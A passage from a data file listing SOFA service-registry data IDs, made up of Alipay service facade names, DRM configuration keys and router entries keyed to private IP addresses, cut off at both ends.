eration.platform.facade.overview.OverviewApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.KeyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.acquirefront.service.facade.api.AcquireUserVerifyVerifyCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.alive.ProdALiveScrollFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.devicemanage.common.service.facade.DeviceManagePrincipalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.mif.common.service.facade.brand.BrandAuthorizationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingCommandManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.downGradeTopicVoteHotInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.meta:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MBAPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicConcernQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.164.70.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antflow.common.service.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.queueMaxSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.tabServiceBusinessParamEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.task.rpc.facade.activity.TransferCodeActivityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","OLD_CLIENTSERVICE_OS_TEST_1_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.pcardOverseaDeduction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_APP1#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.common.service.task.external.service.TaskGzServiceFacade:1.0:mrchmobileGzFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.RequestParamManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ASSETTRANS_CONFIG@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mw-dynamic-client@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.manager.invite.InviteManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-pcshield-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instsign.common.service.facade.instcontract.InstContractUpgradeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.50.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:bkfundportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_CONTROL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.228.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.7.148.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.26.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.finriskcenter.common.facade.api.guardian.OssFileInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custcpt.facade.AccountConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.auth.AuthManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.label.api.ContentLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:mcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_SALESMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kboms.common.service.facade.api.KbomsTbTradeMsgHdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.sceneinvest.starwish.api.StarWishRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.risk.UserRiskTagConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promomng.common.service.facade.workbench.CampGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:zmopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.SignedServiceFacade:1.0:fccryptprod.boss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.message.service.MessageTaskService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.publish.service.CoordinateMessageService:1.0:coordinateMessageService-for-custbridge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.24.8.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finaggexpcore.common.service.facade.crowd.CrowdMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.commonfund.api.CftransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.3.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesecurity.common.service.api.applicationOtpFacade.ApplicationOtpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.audio.AudioMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fdp.facade.api.DataSonarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.invite.TbCardBizDataObtainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.acsellcore.common.service.facade.export.ExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","helloworld.Greeter:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.goods.GoodsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iclientgw.adapterservice.web.MobileRPCAdapterFacade:1.0:securitysimulate@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.robot.RobotPublicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.TaxiOriginalInfoModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.plugin.AbilityPluginQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfaccounttrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.common.service.facade.adaptor.yunyou.YunyouChangeServiceCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.conn.DatabaseConn:1.0:0000200003database@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openpunish.facade.callback.PunishmentActionCallback:1.0:openhome.tinyapp.punishmentActionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:pcreditmarket@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilityprod.common.service.facade.abilitydemo.AbilityDemoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.globalprod.common.service.facade.GlobalMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.MessageNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.common.api.PcreditCommonBillBudgetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.inner.MiniAppMemberInnerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:grsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.38.48.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fin.pdcore.common.service.facade.adapter.AdapterProductQueryFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductFeaturesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.grantNotRetryErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finfoprod.common.service.fsc.facade.AiCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.baoxiancore.common.service.InsApplicationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PROCESSMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_GRAYMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fluxnet.common.service.facade.api.FluxSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianQueueMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulecenter.facade.common.ValidationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yfd.common.service.facade.ds.DataSetOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.185.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.necbill.common.service.asset.AssetTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@quotstore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.rccenter.common.service.facade.RccenterPortalCompFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.core.service.component.drm.LDCCacheSyncSwitchDrmResource.isOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:homeproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.auth.AuthFieldManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.UserShiftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.asyncExecutor.clearingcenter.aysncExecutorMaxPoolSize,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopcenter.common.service.facade.album.api.AlbumQuery4ManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.virtualprod.common.service.facade.educate.agent.EduAgentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iopengw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_planRcsmartProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iintegration.common.service.facade.api.SandboxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.operation.facade.AssetReqOrderItemDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskbiz.common.service.facade.api.CommonRiskDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaxconnectplatform.service.miniapprpc.XpMiniAppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_OAPI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.clerktone.facade.api.clerk.info.ClerkInvitationQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.policyCountStatisticsWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.capability.payments.InquiryPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.manage.MccIndustryPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.AccountOverDraftInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdswindspeed.facade.rfc.RfcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.drm.CommunityDRMManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.OutfluxAckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwsmall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.mng.api.OperationLogMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PolicyInstanceFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_COMMUNITYPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.BrandShopDecorateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.changerequirement.facade.api.ChangeDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.trafficcardsp.common.service.facade.TrafficDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinOutfluxHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.JobFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:omegakoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipassprod.service.facade.api.SystemParamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:plugin-dep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.SignRuleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.fundredeem.FundRedeemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.insrap.facade.AlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finaggexpcore.common.service.facade.crowd.CrowdMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.developertool.facade.channel.TrProcessor:1.0:ideServiceDispatchFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.easytrip.facacde.api.scenic.ScenicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.query.FundOpenAuQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dragonx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.parkinglot.access.ParkingRecordFacade:1.0:parkingRecordTrFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.output.ResponseBuildFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.noCopyInTFcProdCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mindv.okcourse.service.OkCourseDonationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.PostPayStopCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.expandYearsWithD,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizbilling.common.service.BizBillService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofaroute.service.facade.RouteFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.24.10.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilerelation.common.service.facade.AlipayRelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.SearchGroovyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:distinguishprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:luckyBagComputeExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.app.AppRoleServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mfinquotationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.142.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:iacquirecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.facade.antha.AnthaTinyappChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:securitydataproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.securitycore.common.service.facade.policy.SecurityPolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.39.221.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.troublehunter.common.service.facade.api.fault.diagnosis.DiagnosisServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imemberprod.service.facade.api.prod.CertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.createMerchantJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agds.facade.huabei.AgdsadPCCreditMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.EtlConceptualFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.questionnaire.QuestionnaireMetaInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:opscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.FinMonthReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.drawndn.DrawndnInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.bankcard.facade.WithdrawCardQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableCampRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.108.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.test2.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dwebupload.client.drm.DomainConfig.uploadTarget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.holoxmng.sop.service.facade.OnboardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.workflow.service.facade.callback.ProcessCallback:1.0:workorder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.199.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.iot.tangula.facade.risk.RiskControlService:1.0:tangula@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acgotonecore.facade.service.GotoneServiceForInternalFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchstoreapp.store.biz.ecard.EcardBaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.taskcenter.TaskCenterQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_FINFOSERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradequery.common.service.facade.TradeProcessQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.common.service.facade.viewreport.EcoQltPerfExpScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.FintradeOrderRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ordercore.mrch.common.service.api.BatchArQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antdata.favorite.FavoriteWrapperFacade:1.0:antdata_FavoriteWrapperFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.assettrans.FaAssetTransClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.insure.trade.AutoInsAgentTradeFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxTaskDataWriter:1.0:echoagent@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scfmngCommonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.mmcard.UpdateCifTagTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.cacheStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adatabus.common.service.facade.DatabusBizParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.C